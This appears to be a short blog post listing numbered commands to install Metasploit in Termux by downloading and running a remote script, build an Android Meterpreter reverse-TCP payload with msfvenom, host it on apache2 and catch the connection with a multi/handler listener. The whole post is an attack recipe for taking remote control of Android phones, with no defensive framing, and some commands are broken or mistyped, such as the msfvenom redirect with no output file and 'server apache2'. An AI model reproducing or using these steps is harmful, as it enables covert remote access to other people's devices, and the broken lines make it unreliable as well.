FOR THE Meterpreter
FOR THE METASPLOIT
1:- pkg install wget
wget https://raw.githubusercontent.com/gushmazuko/metasploit_in_termux/master/metasploit.sh
chmod +x metasploit.sh
./metasploit.sh
2:- msfconsole
3:- msfvenom -p android/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=2345 R >
4:- server apache2 start
5:- server apache2 status
6:- use multi/handler
7:- set PAYLOAD android/meterpreter/reverse_tcp
8:- set LHOST 127.0.0.1
9:- set LPORT 2345
10:- exploit
11:- show option
Comments
Post a Comment